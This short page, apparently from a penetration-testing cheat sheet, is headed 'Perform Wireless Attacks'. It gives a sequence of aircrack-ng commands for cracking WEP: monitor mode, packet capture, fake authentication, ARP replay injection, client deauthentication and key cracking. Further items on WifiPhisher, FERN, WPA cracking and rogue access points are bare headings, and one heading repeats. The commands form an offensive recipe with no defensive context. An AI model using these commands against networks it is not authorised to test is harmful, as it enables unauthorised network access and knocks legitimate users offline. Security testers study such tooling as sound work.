3. Perform Wireless Attacks

1. Crack WEP using Aircrack-ng

airmon-ng start wlan0
airodump-ng
airodump-ng –w "filename" -c "channel name"
aireplay-ng -1 0 -a (bssid) -h (mac of your card) -e (essid) (interface)
aireplay-ng -3 –b "bssid" -h "mac address"
aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client mon0
aircrack-ng -b "filename.cap"

2. Crack WEP using WifiPhisher

3. Crack WEP using Aircrack-ng

4. Crack WPA with FERN cracker

5. Crack WPA with Aircrack

6. Create a Rogue access Point

Last updated